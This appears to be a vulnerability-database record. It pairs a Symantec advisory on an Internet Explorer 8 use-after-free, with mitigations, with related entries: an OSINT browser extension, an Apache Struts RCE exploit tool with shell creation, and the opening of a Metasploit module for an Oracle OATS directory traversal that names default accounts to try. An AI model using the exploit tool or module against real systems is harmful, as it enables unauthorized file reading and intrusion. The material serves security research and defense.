Microsoft Internet Explorer Select HTML Element Use-After-Free Memory Corruption Vulnerability
2010-12-14T00:00:00
ID SMNTC-45260 Type symantec Reporter Symantec Security Response Modified 2010-12-14T00:00:00
Description
Description
Microsoft Internet Explorer is prone to a remote memory-corruption vulnerability. Successful exploits will allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks will cause denial-of-service conditions.
Technologies Affected
Avaya Aura Conferencing 6.0 Standard
Avaya CallPilot 4.0
Avaya CallPilot 5.0
Avaya CallPilot
Avaya Communication Server 1000 Telephony Manager 3.0
Avaya Communication Server 1000 Telephony Manager 4.0
Avaya Communication Server 1000 Telephony Manager
Avaya Meeting Exchange - Client Registration Server
Avaya Meeting Exchange - Recording Server
Avaya Meeting Exchange - Streaming Server
Avaya Meeting Exchange - Web Conferencing Server
Avaya Meeting Exchange - Webportal
Avaya Meeting Exchange 5.0
Avaya Meeting Exchange 5.0 SP1
Avaya Meeting Exchange 5.0.0.0.52
Avaya Meeting Exchange 5.1
Avaya Meeting Exchange 5.1 SP1
Avaya Meeting Exchange 5.2
Avaya Meeting Exchange 5.2 SP1
Avaya Meeting Exchange 5.2 SP2
Avaya Messaging Application Server 4
Avaya Messaging Application Server 5.2
Microsoft Internet Explorer 8
Recommendations
Run all software as a nonprivileged user with minimal access rights.
To reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.
Deploy network intrusion detection systems to monitor network traffic for malicious activity.
Deploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.
Do not accept or execute files from untrusted or unknown sources.
Exercise caution when handling files received from unfamiliar or suspicious sources.
Do not follow links provided by unknown or untrusted sources.
Web users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.
Set web browser security to disable the execution of script code or active content.
Since a successful exploit of these issues requires malicious code to execute in web clients, consider disabling support for script code and active content within the client browser. Note that this mitigation tactic might adversely affect legitimate websites that rely on the execution of browser-based script code.
Implement multiple redundant layers of security.
Various memory-protection schemes (such as nonexecutable and randomly mapped memory segments) may hinder an attacker's ability to exploit this vulnerability to execute arbitrary code.
The vendor has released an advisory and updates. Please see the references for details.
{"published": "2010-12-14T00:00:00", "id": "SMNTC-45260", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["description", "href", "affectedSoftware"], "edition": 1, "lastseen": "2016-09-04T11:42:00", "bulletin": {"published": "2010-12-14T00:00:00", "href": "https://www.symantec.com/security_response/vulnerability.jsp?bid=45260", "cvss": {"score": 0.0, "vector": "NONE"}, "reporter": "Symantec Security Response", "history": [], "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote memory-corruption vulnerability. Successful exploits will allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks will cause denial-of-service conditions. \n\n### Technologies Affected\n\n * Avaya Aura Conferencing 6.0 Standard\n * Avaya CallPilot\n * Avaya CallPilot 4.0\n * Avaya CallPilot 5.0\n * Avaya Communication Server 1000 Telephony Manager\n * Avaya Communication Server 1000 Telephony Manager 3.0\n * Avaya Communication Server 1000 Telephony Manager 4.0\n * Avaya Meeting Exchange - Client Registration Server\n * Avaya Meeting Exchange - Recording Server\n * Avaya Meeting Exchange - Streaming Server\n * Avaya Meeting Exchange - Web Conferencing Server\n * Avaya Meeting Exchange - Webportal\n * Avaya Meeting Exchange 5.0\n * Avaya Meeting Exchange 5.0 SP1\n * Avaya Meeting Exchange 5.0.0.0.52\n * Avaya Meeting Exchange 5.1\n * Avaya Meeting Exchange 5.1 SP1\n * Avaya Meeting Exchange 5.2\n * Avaya Meeting Exchange 5.2 SP1\n * Avaya Meeting Exchange 5.2 SP2\n * Avaya Messaging Application Server 4\n * Avaya Messaging Application Server 5.2\n * Microsoft Internet Explorer 8\n\n### Recommendations\n\n#### Run all software as a nonprivileged user with minimal access rights.\n\nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n#### Deploy network intrusion detection systems to monitor network traffic for malicious activity.\n\nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n#### Do not accept or execute files from untrusted or unknown sources.\n\nExercise caution when handling files received from unfamiliar or suspicious sources.\n\n#### Do not follow links provided by unknown or untrusted sources.\n\nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n#### Set web browser security to disable the execution of script code or active content.\n\nSince a successful exploit of these issues requires malicious code to execute in web clients, consider disabling support for script code and active content within the client browser. Note that this mitigation tactic might adversely affect legitimate websites that rely on the execution of browser-based script code.\n\n#### Implement multiple redundant layers of security.\n\nVarious memory-protection schemes (such as nonexecutable and randomly mapped memory segments) may hinder an attacker's ability to exploit this vulnerability to execute arbitrary code. \n\nThe vendor has released an advisory and updates. Please see the references for details. \n", "bulletinFamily": "software", "viewCount": 0, "cvelist": [], "affectedSoftware": [{"version": "8", "name": "Microsoft Internet Explorer", "operator": "eq"}, {"version": "5.0.0.0.52", "name": "Avaya Meeting Exchange", "operator": "eq"}, {"version": "5.1", "name": "Avaya Meeting Exchange", "operator": "eq"}, {"version": "6.0", "name": "Avaya Aura Conferencing", "operator": "eq"}, {"version": "5.0", "name": "Avaya Meeting Exchange", "operator": "eq"}, {"version": "5.0 SP1", "name": "Avaya Meeting Exchange", "operator": "eq"}, {"version": "5.2", "name": "Avaya Messaging Application Server", "operator": "eq"}, {"version": "5.1 SP1", "name": "Avaya Meeting Exchange", "operator": "eq"}, {"version": "5.0", "name": "Avaya CallPilot", "operator": "eq"}, {"version": "4.0", "name": "Avaya CallPilot", "operator": "eq"}, {"version": "4.0", "name": "Avaya Communication Server 1000 Telephony Manager", "operator": "eq"}, {"version": "3.0", "name": "Avaya Communication Server 1000 Telephony Manager", "operator": "eq"}, {"version": "4", "name": "Avaya Messaging Application Server", "operator": "eq"}, {"version": "5.2 SP2", "name": "Avaya Meeting Exchange", "operator": "eq"}, {"version": "any", "name": "Avaya CallPilot", "operator": "eq"}, {"version": "5.2 SP1", "name": "Avaya Meeting Exchange", "operator": "eq"}, {"version": "5.2", "name": "Avaya Meeting Exchange", "operator": "eq"}], "type": "symantec", "hash": "d24f91c872c6eabc8640f33104582469cb65882ce7f6895368eff9ccbd859cb6", "references": [], "enchantments": {"score": {"value": 7.6, "modified": "2016-09-04T11:42:00"}}, "title": "Microsoft Internet Explorer Select HTML Element Use-After-Free Memory Corruption Vulnerability", "id": "SMNTC-45260", "lastseen": "2016-09-04T11:42:00", "edition": 1, "objectVersion": "1.2", "hashmap": [{"hash": "2327770b6e922db44b106f817ddd59bf", "key": "title"}, {"hash": "dfa54dbdc8f160ce679590a6bc43a5be", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "52e3bbafc627009ac13caff1200a0dbf", "key": "type"}, {"hash": "ab2739552698cab1bd08fc30a431b876", "key": "affectedSoftware"}, {"hash": "2cd2129e736dbd300d66372c0d7482ab", "key": "href"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "dfa54dbdc8f160ce679590a6bc43a5be", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "184d18da32a4b90004d0b34ce5809edd", "key": "description"}, {"hash": "d6218597dc7a1b025a781373296b2b63", "key": "reporter"}], "modified": "2010-12-14T00:00:00"}}], "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote memory-corruption vulnerability. Successful exploits will allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks will cause denial-of-service conditions.\n\n### Technologies Affected\n\n * Avaya Aura Conferencing 6.0 Standard \n * Avaya CallPilot 4.0 \n * Avaya CallPilot 5.0 \n * Avaya CallPilot \n * Avaya Communication Server 1000 Telephony Manager 3.0 \n * Avaya Communication Server 1000 Telephony Manager 4.0 \n * Avaya Communication Server 1000 Telephony Manager \n * Avaya Meeting Exchange - Client Registration Server \n * Avaya Meeting Exchange - Recording Server \n * Avaya Meeting Exchange - Streaming Server \n * Avaya Meeting Exchange - Web Conferencing Server \n * Avaya Meeting Exchange - Webportal \n * Avaya Meeting Exchange 5.0 \n * Avaya Meeting Exchange 5.0 SP1 \n * Avaya Meeting Exchange 5.0.0.0.52 \n * Avaya Meeting Exchange 5.1 \n * Avaya Meeting Exchange 5.1 SP1 \n * Avaya Meeting Exchange 5.2 \n * Avaya Meeting Exchange 5.2 SP1 \n * Avaya Meeting Exchange 5.2 SP2 \n * Avaya Messaging Application Server 4 \n * Avaya Messaging Application Server 5.2 \n * Microsoft Internet Explorer 8 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nExercise caution when handling files received from unfamiliar or suspicious sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Set web browser security to disable the execution of script code or active content.** \nSince a successful exploit of these issues requires malicious code to execute in web clients, consider disabling support for script code and active content within the client browser. Note that this mitigation tactic might adversely affect legitimate websites that rely on the execution of browser-based script code.\n\n**Implement multiple redundant layers of security.** \nVarious memory-protection schemes (such as nonexecutable and randomly mapped memory segments) may hinder an attacker's ability to exploit this vulnerability to execute arbitrary code.\n\nThe vendor has released an advisory and updates. Please see the references for details.\n", "hash": "d22efac8bcedf06edd349fe55bd0e029ab4a89b24b63ac0cb8da8808dfb104e9", "enchantments": {"score": {"value": 1.1, "vector": "NONE", "modified": "2018-03-12T04:24:46"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "THREATPOST:D5150098043DAE7CDF2E31618C33F5D2"]}, {"type": "nessus", "idList": ["SMB_NT_MS10-090.NASL"]}], "modified": "2018-03-12T04:24:46"}, "vulnersScore": 1.1}, "type": "symantec", "lastseen": "2018-03-12T04:24:46", "edition": 2, "title": "Microsoft Internet Explorer Select HTML Element Use-After-Free Memory Corruption Vulnerability", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/45260", "modified": "2010-12-14T00:00:00", "bulletinFamily": "software", "viewCount": 0, "cvelist": [], "affectedSoftware": [{"version": "1000 Telephony Manager 3.0 ", "name": "Avaya Communication Server", "operator": "eq"}, {"version": "5.0 SP1 ", "name": "Avaya Meeting Exchange", "operator": "eq"}, {"version": "1000 Telephony Manager 4.0 ", "name": "Avaya Communication Server", "operator": "eq"}, {"version": "5.2 SP2 ", "name": "Avaya Meeting Exchange", "operator": "eq"}, {"version": "5.0.0.0.52 ", "name": "Avaya Meeting Exchange", "operator": "eq"}, {"version": "5.1 ", "name": "Avaya Meeting Exchange", "operator": "eq"}, {"version": "4.0 ", "name": "Avaya CallPilot", "operator": "eq"}, {"version": "5.2 ", "name": "Avaya Meeting Exchange", "operator": "eq"}, {"version": "1000 Telephony Manager ", "name": "Avaya Communication Server", "operator": "eq"}, {"version": "8 ", "name": "Microsoft Internet Explorer", "operator": "eq"}, {"version": "5.0 ", "name": "Avaya CallPilot", "operator": "eq"}, {"version": "5.1 SP1 ", "name": "Avaya Meeting Exchange", "operator": "eq"}, {"version": "6.0 Standard ", "name": "Avaya Aura Conferencing", "operator": "eq"}, {"version": "5.2 SP1 ", "name": "Avaya Meeting Exchange", "operator": "eq"}, {"version": "4 ", "name": "Avaya Messaging Application Server", "operator": "eq"}, {"version": "5.0 ", "name": "Avaya Meeting Exchange", "operator": "eq"}, {"version": "5.2 ", "name": "Avaya Messaging Application Server", "operator": "eq"}], "references": [], "reporter": "Symantec Security Response", "hashmap": [{"hash": "24242c274b3810dadeed2c3d51db974f", "key": "affectedSoftware"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "fb6717d67f38c4cd7088172bf559d821", "key": "description"}, {"hash": "600c8de731e6b89f7a32c71997c76bf5", "key": "href"}, {"hash": "dfa54dbdc8f160ce679590a6bc43a5be", "key": "modified"}, {"hash": "dfa54dbdc8f160ce679590a6bc43a5be", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "d6218597dc7a1b025a781373296b2b63", "key": "reporter"}, {"hash": "2327770b6e922db44b106f817ddd59bf", "key": "title"}, {"hash": "52e3bbafc627009ac13caff1200a0dbf", "key": "type"}], "objectVersion": "1.3"}
{"kitploit": [{"lastseen": "2019-10-21T14:35:52", "bulletinFamily": "tools", "description": "[  ](<https://1.bp.blogspot.com/-9cslz9huO_U/XYAeBJbmtNI/AAAAAAAAQXo/vfBLw3xqV-stKkRe0MzCd4fOhcbHSMVCwCNcBGAsYHQ/s1600/mitaka_8_eyecatch.png>)\n\n \nMitaka is a browser extension for [ OSINT ](<https://www.kitploit.com/search/label/OSINT> \"OSINT\" ) search which can: \n\n\n * Extract & refang IoC from a selected block of text. \n * E.g. ` example[.]com ` to ` example.com ` , ` test[at]example.com ` to ` [email protected] ` , ` hxxp://example.com ` to ` http://example.com ` , etc. \n * Search / scan it on various engines. \n * E.g. VirusTotal, urlscan.io, Censys, Shodan, etc. \n \n** Features ** \n \n** Supported IOC types ** \nname | desc. | e.g. \n---|---|--- \ntext | Freetext | any string(s) \nip | IPv4 address | ` 8.8.8.8 ` \ndomain | Domain name | ` github.com ` \nurl | URL | ` https://github.com ` \nemail | Email address | ` [email protected] ` \nasn | ASN | ` AS13335 ` \nhash | md5 / sha1 / sha256 | ` 44d88612fea8a8f36de82e1278abb02f ` \ncve | CVE number | ` CVE-2018-11776 ` \nbtc | BTC address | ` 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa ` \ngaPubID | Google Adsense Publisher ID | ` pub-9383614236930773 ` \ngaTrackID | Google [ Analytics ](<https://www.kitploit.com/search/label/Analytics> \"Analytics\" ) Tracker ID | ` UA-67609351-1 ` \n \n** Supported search engines ** \nname | url | supported types \n---|---|--- \nAbuseIPDB | [ https://www.abuseipdb.com ](<https://www.abuseipdb.com/> \"https://www.abuseipdb.com\" ) | ip \narchive.org | [ https://archive.org ](<https://archive.org/> \"https://archive.org\" ) | url \narchive.today | [ http://archive.fo ](<https://archive.fo/> \"http://archive.fo\" ) | url \nBGPView | [ https://bgpview.io ](<https://bgpview.io/> \"https://bgpview.io\" ) | ip / asn \nBinaryEdge | [ https://app.binaryedge.io ](<https://app.binaryedge.io/> \"https://app.binaryedge.io\" ) | ip / domain \nBitcoinAbuse | [ https://www.bitcoinabuse.com ](<https://www.bitcoinabuse.com/> \"https://www.bitcoinabuse.com\" ) | btc \nBlockchain.com | [ https://www.blockchain.com ](<https://www.blockchain.com/> \"https://www.blockchain.com\" ) | btc \nBlockCypher | [ https://live.blockcypher.com ](<https://live.blockcypher.com/> \"https://live.blockcypher.com\" ) | btc \nCensys | [ https://censys.io ](<https://censys.io/> \"https://censys.io\" ) | ip / domain / asn / text \ncrt.sh | [ https://crt.sh ](<https://crt.sh/> \"https://crt.sh\" ) | domain \nDNSlytics | [ https://dnslytics.com ](<https://dnslytics.com/> \"https://dnslytics.com\" ) | ip / domain \nDomainBigData | [ https://domainbigdata.com ](<https://domainbigdata.com/> \"https://domainbigdata.com\" ) | domain \nDomainTools | [ https://www.domaintools.com ](<https://www.domaintools.com/> \"https://www.domaintools.com\" ) | ip / domain \nDomainWatch | [ https://domainwat.ch ](<https://domainwat.ch/> \"https://domainwat.ch\" ) | domain / email \nEmailRep | [ https://emailrep.io ](<https://emailrep.io/> \"https://emailrep.io\" ) | email \nFindSubDomains | [ https://findsubdomains.com ](<https://findsubdomains.com/> \"https://findsubdomains.com\" ) | domain \nFOFA | [ https://fofa.so ](<https://fofa.so/> \"https://fofa.so\" ) | ip / domain \nFortiGuard | [ https://fortiguard.com ](<https://fortiguard.com/> \"https://fortiguard.com\" ) | ip / url / cve \nGoogle Safe Browsing | [ https://transparencyreport.google.com ](<https://transparencyreport.google.com/> \"https://transparencyreport.google.com\" ) | domain / url \nGreyNoise | [ https://viz.greynoise.io ](<https://viz.greynoise.io/> \"https://viz.greynoise.io\" ) | ip / domain / asn \nHashdd | [ https://hashdd.com ](<https://hashdd.com/> \"https://hashdd.com\" ) | ip / domain / hash \nHybridAnalysis | [ https://www.hybrid-analysis.com ](<https://www.hybrid-analysis.com/> \"https://www.hybrid-analysis.com\" ) | ip / domain / hash (sha256 only) \nIntelligence X | [ https://intelx.io ](<https://intelx.io/> \"https://intelx.io\" ) | ip / domain / url / email / btc \nIPinfo | [ https://ipinfo.io ](<https://ipinfo.io/> \"https://ipinfo.io\" ) | ip / asn \nIPIP | [ https://en.ipip.net ](<https://en.ipip.net/> \"https://en.ipip.net\" ) | ip / asn \nJoe Sandbox | [ https://www.joesandbox.com ](<https://www.joesandbox.com/> \"https://www.joesandbox.com\" ) | hash \nMalShare | [ https://malshare.com ](<https://malshare.com/> \"https://malshare.com\" ) | hash \nMaltiverse | [ https://www.maltiverse.com ](<https://www.maltiverse.com/> \"https://www.maltiverse.com\" ) | domain / hash \nNVD | [ https://nvd.nist.gov ](<https://nvd.nist.gov/> \"https://nvd.nist.gov\" ) | cve \nOOCPR | [ https://data.occrp.org ](<https://data.occrp.org/> \"https://data.occrp.org\" ) | email \nONYPHE | [ https://www.onyphe.io ](<https://www.onyphe.io/> \"https://www.onyphe.io\" ) | ip \nOTX | [ https://otx.alienvault.com ](<https://otx.alienvault.com/> \"https://otx.alienvault.com\" ) | ip / domain / hash \nPubDB | [ http://pub-db.com ](<http://pub-db.com/> \"http://pub-db.com\" ) | gaPubID / gaTrackID \nPublicWWW | [ https://publicwww.com ](<https://publicwww.com/> \"https://publicwww.com\" ) | text \nPulsedive | [ https://pulsedive.com ](<https://pulsedive.com/> \"https://pulsedive.com\" ) | ip / domaion / url / hash \nRiskIQ | [ http://community.riskiq.com ](<http://community.riskiq.com/> \"http://community.riskiq.com\" ) | ip / domain / email / gaTrackID \nSecurityTrails | [ https://securitytrails.com ](<https://securitytrails.com/> \"https://securitytrails.com\" ) | ip / domain / email \nShodan | [ https://www.shodan.io ](<https://www.shodan.io/> \"https://www.shodan.io\" ) | ip / domain / asn \nSploitus | [ https://sploitus.com ](<https://sploitus.com/> \"https://sploitus.com\" ) | cve \nSpyOnWeb | [ http://spyonweb.com ](<http://spyonweb.com/> \"http://spyonweb.com\" ) | ip / domain / gaPubID / gaTrackID \nTalos | [ https://talosintelligence.com ](<https://talosintelligence.com/> \"https://talosintelligence.com\" ) | ip / domain \nThreatConnect | [ https://app.threatconnect.com ](<https://app.threatconnect.com/> \"https://app.threatconnect.com\" ) | ip / domain / email \nThreatCrowd | [ https://www.threatcrowd.org ](<https://www.threatcrowd.org/> \"https://www.threatcrowd.org\" ) | ip / domain / email \nThreatMiner | [ https://www.threatminer.org ](<https://www.threatminer.org/> \"https://www.threatminer.org\" ) | ip / domain / hash \nTIP | [ https://threatintelligenceplatform.com ](<https://threatintelligenceplatform.com/> \"https://threatintelligenceplatform.com\" ) | ip / domain \nUrlscan | [ https://urlscan.io ](<https://urlscan.io/> \"https://urlscan.io\" ) | ip / domain / asn / url \nViewDNS | [ https://viewdns.info ](<https://viewdns.info/> \"https://viewdns.info\" ) | ip / domain / email \nVirusTotal | [ https://www.virustotal.com ](<https://www.virustotal.com/> \"https://www.virustotal.com\" ) | ip / domain / url / hash \nVulmon | [ https://vulmon.com ](<https://vulmon.com/> \"https://vulmon.com\" ) | cve \nVulncodeDB | [ https://www.vulncode-db.com ](<https://www.vulncode-db.com/> \"https://www.vulncode-db.com\" ) | cve \nVxCube | [ http://vxcube.com ](<http://vxcube.com/> \"http://vxcube.com\" ) | ip / domain / hash \nWebAnalyzer | [ https://wa-com.com ](<https://wa-com.com/> \"https://wa-com.com\" ) | domain \nWe Leak Info | [ https://weleakinfo.com ](<https://weleakinfo.com/> \"https://weleakinfo.com\" ) | email \nX-Force Exchange | [ https://exchange.xforce.ibmcloud.com ](<https://exchange.xforce.ibmcloud.com/> \"https://exchange.xforce.ibmcloud.com\" ) | ip / domain / hash \nZoomEye | [ https://www.zoomeye.org ](<https://www.zoomeye.org/> \"https://www.zoomeye.org\" ) | ip \n \n** Supported scan engines ** \nname | url | supported types \n---|---|--- \nUrlscan | [ https://urlscan.io ](<https://urlscan.io/> \"https://urlscan.io\" ) | ip / domain / url \nVirusTotal | [ https://www.virustotal.com ](<https://www.virustotal.com/> \"https://www.virustotal.com\" ) | url \n \n** Downloads ** \n\n\n * Chrome: [ https://chrome.google.com/webstore/detail/mitaka/bfjbejmeoibbdpfdbmbacmefcbannnbg ](<https://chrome.google.com/webstore/detail/mitaka/bfjbejmeoibbdpfdbmbacmefcbannnbg> \"https://chrome.google.com/webstore/detail/mitaka/bfjbejmeoibbdpfdbmbacmefcbannnbg\" )\n * FireFox: [ https://addons.mozilla.org/en-US/firefox/addon/mitaka/ ](<https://addons.mozilla.org/en-US/firefox/addon/mitaka/> \"https://addons.mozilla.org/en-US/firefox/addon/mitaka/\" )\n \n** How to use ** \nThis browser extension shows context menus based on a type of IoC you selected and then you can choose what you want to search / scan on. \n \n** Examples: ** \n \n\n\n[  ](<https://1.bp.blogspot.com/-2tdM6fuXGfQ/XYAeOc1TdNI/AAAAAAAAQXs/o9Yh-_pJEdwOcF-5KM-3Hj9CjQSlHLl5wCNcBGAsYHQ/s1600/mitaka_9_1.gif>)\n\n \n\n\n[  ](<https://1.bp.blogspot.com/-4t9b6shG_iQ/XYAeOVytJkI/AAAAAAAAQXw/b4P4PJz5gU0lDqmKpJ9dL3jhiUVXkhOxwCNcBGAsYHQ/s1600/mitaka_10_2.gif>)\n\n \n** Note: ** \nPlease set your urlscan.io & [ VirusTotal ](<https://www.kitploit.com/search/label/VirusTotal> \"VirusTotal\" ) API keys in the options page for enabling urlscan.io & VirusTotal scans. \n \n** Options ** \nYou can enable / disable a search engine on the options page based on your preference. \n \n\n\n[  ](<https://1.bp.blogspot.com/-dP_LGUSsF1M/XYAeT14bPsI/AAAAAAAAQX0/U7gyifaFxOgCv92e0_k0fugVzaLMShGIACNcBGAsYHQ/s1600/mitaka_11_options.png>)\n\n \n** About Permissons ** \nThis browser extension requires the following permissions. \n\n\n * ` Read and change all your data on the websites you visit ` : \n * This extension creates context menus dynamically based on what you select on a website. \n * It means this extension requires reading all your data on the websites you visit. (This extension doesn't change anything on the websites) \n * ` Display notifications ` : \n * This extension makes a notification when something goes wrong. \nI don't (and will never) collect any information from the users. \n \n** Alternatives or Similar Tools ** \n\n\n * [ CrowdScrape ](<https://chrome.google.com/webstore/detail/crowdscrape/jjplaeklnlddpkbbdbnogmppffokemej> \"CrowdScrape\" )\n * [ Gotanda ](<https://github.com/HASH1da1/Gotanda> \"Gotanda\" )\n * [ Sputnik ](<https://github.com/mitchmoser/sputnik> \"Sputnik\" )\n * [ ThreatConnect Integrated ](<https://chrome.google.com/webstore/detail/threatconnect-integrated/lblgcphpihpadjdpjgjnnoikjdjcnkbh> \"ThreatConnect Integrated \" ) [ Chrome ](<https://www.kitploit.com/search/label/Chrome> \"Chrome\" ) Extension \n * [ ThreatPinch Lookup ](<https://github.com/cloudtracer/ThreatPinchLookup> \"ThreatPinch Lookup\" )\n * [ VTchromizer ](<https://chrome.google.com/webstore/detail/vtchromizer/efbjojhplkelaegfbieplglfidafgoka> \"VTchromizer\" )\n \n** How to build (for developers) ** \nThis browser extension is written in [ TypeScript ](<https://www.typescriptlang.org/> \"TypeScript\" ) and built by [ webpack ](<https://webpack.js.org/> \"webpack\" ) . \nTypeScript files will start out in ` src ` directory, run through the TypeScript compiler, then webpack, and end up in JavaScript files in ` dist ` directory. \n\n \n \n git clone https://github.com/ninoseki/mitaka.git\n cd mitaka\n npm install\n npm run test\n npm run build\n\nFor loading an unpacked extension, please follow the procedures described at [ https://developer.chrome.com/extensions/getstarted ](<https://developer.chrome.com/extensions/getstarted> \"https://developer.chrome.com/extensions/getstarted\" ) . \n \n** Misc ** \nMitaka/\u898b\u305f\u304b means \"Have you seen it?\" in Japanese. \n \n \n\n\n** [ Download Mitaka ](<https://github.com/ninoseki/mitaka> \"Download Mitaka\" ) **\n", "modified": "2019-09-21T12:00:07", "published": "2019-09-21T12:00:07", "id": "KITPLOIT:8708017483803645203", "href": "http://www.kitploit.com/2019/09/mitaka-browser-extension-for-osint.html", "title": "Mitaka - A Browser Extension For OSINT Search", "type": "kitploit", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-18T16:37:07", "bulletinFamily": "tools", "description": " \n\n\n[  ](<https://3.bp.blogspot.com/-MKbYVQXvBz0/W4LReq3_cJI/AAAAAAAAMQ0/WgNhU5_o5cIwFs69p3T2YIf3xObo_rAtgCLcBGAs/s1600/Apache-Struts-v3_1_screen.png>)\n\n \nScript contains the fusion of 3 RCE vulnerabilities on ApacheStruts, it also has the ability to create server shells. \n \n** SHELL ** \n** php ** ` finished ` \n** jsp ** ` process ` \n \n** CVE ADD ** \n** CVE-2013-2251 ** ` 'action:', 'redirect:' and 'redirectAction' ` \n** CVE-2017-5638 ** ` Content-Type ` \n** CVE-2018-11776 ** ` 'redirect:' and 'redirectAction' ` \n \n \n\n\n** [ Download Apache-Struts-v3 ](<https://github.com/s1kr10s/Apache-Struts-v3>) **\n", "modified": "2018-08-26T21:14:01", "published": "2018-08-26T21:14:01", "id": "KITPLOIT:4611207874033525364", "href": "http://www.kitploit.com/2018/08/apache-struts-v3-tool-to-exploit-3-rce.html", "title": "Apache Struts v3 - Tool To Exploit 3 RCE Vulnerabilities On ApacheStruts", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2019-12-07T08:30:12", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability in Oracle Application Testing Suite (OATS). In the Load Testing interface, a remote user can abuse the custom report template selector, and cause the DownloadServlet class to read any file on the server as SYSTEM. Since the Oracle application contains multiple configuration files that include encrypted credentials, and that there are public resources for decryption, it is actually possible to gain remote code execution by leveraging this directory traversal attack. Please note that authentication is required. By default, OATS has two built-in accounts: default and administrator. You could try to target those first.\n", "modified": "2019-05-23T17:35:45", "published": "2019-05-07T19:56:04", "id": "MSF:AUXILIARY/GATHER/OATS_DOWNLOADSERVLET_TRAVERSAL", "href": "", "type": "metasploit", "title": "Oracle Application Testing Suite Post-Auth DownloadServlet Directory Traversal", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rkelly'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Oracle Application Testing Suite Post-Auth DownloadServlet Directory Traversal',\n 'Description' => %q{\n This module exploits a vulnerability in Oracle Application Testing Suite (OATS). In the Load\n Testing interface, a remote user can abuse the custom report template selector, and cause the\n DownloadServlet class to read any file on the server as SYSTEM. Since the Oracle application\n contains multiple configuration files that include encrypted credentials, and that there are\n public resources for decryption, it is actually possible to gain remote code execution\n by leveraging this directory traversal attack.\n\n Please note that authentication is required. By default, OATS has two built-in accounts:\n default and administrator. You could try to target those first.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Steven Seeley', # Original discovery\n 'sinn3r' # Metasploit module\n ],\n 'DefaultOptions' =>\n {\n 'RPORT' => 8088\n },\n 'References' =>\n [\n ['CVE', '2019-2557'],\n ['URL', 'https://srcincite.io/advisories/src-2019-0033/'],\n ['URL', 'https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html']\n ],\n 'DisclosureDate' => '2019-04-16'\n ))\n\n register_options(\n [\n OptString.new('FILE', [true, 'The name of the file to download', 'oats-config.xml']),\n OptInt.new('DEPTH', [true, 'The max traversal depth', 1]),\n OptString.new('OATSUSERNAME', [true, 'The username to use for Oracle', 'default']),\n OptString.new('OATSPASSWORD', [true, 'The password to use for Oracle']),\n ])\n end\n\n class OracleAuthSpec\n attr_accessor :loop_value\n attr_accessor :afr_window_id\n attr_accessor :adf_window_id\n attr_accessor :adf_ads_page_id\n attr_accessor :adf_page_id\n attr_accessor :form_value\n attr_accessor :session_id\n attr_accessor :view_direct\n attr_accessor :view_state\n end\n\n # OATS ships LoadTest500VU_Build1 and LoadTest500VU_Build2 by default,\n # and there is no way to remove it from the user interface, so this should be\n # safe to say that there will always there.\n DEFAULT_SESSION = 'LoadTest500VU_Build1'\n\n def auth_spec\n @auth_spec ||= OracleAuthSpec.new\n end\n\n def check\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'olt/')\n })\n\n if res && res.body.include?('AdfLoopbackUtils.runLoopback')\n Exploit::CheckCode::Detected\n else\n Exploit::CheckCode::Safe\n end\n 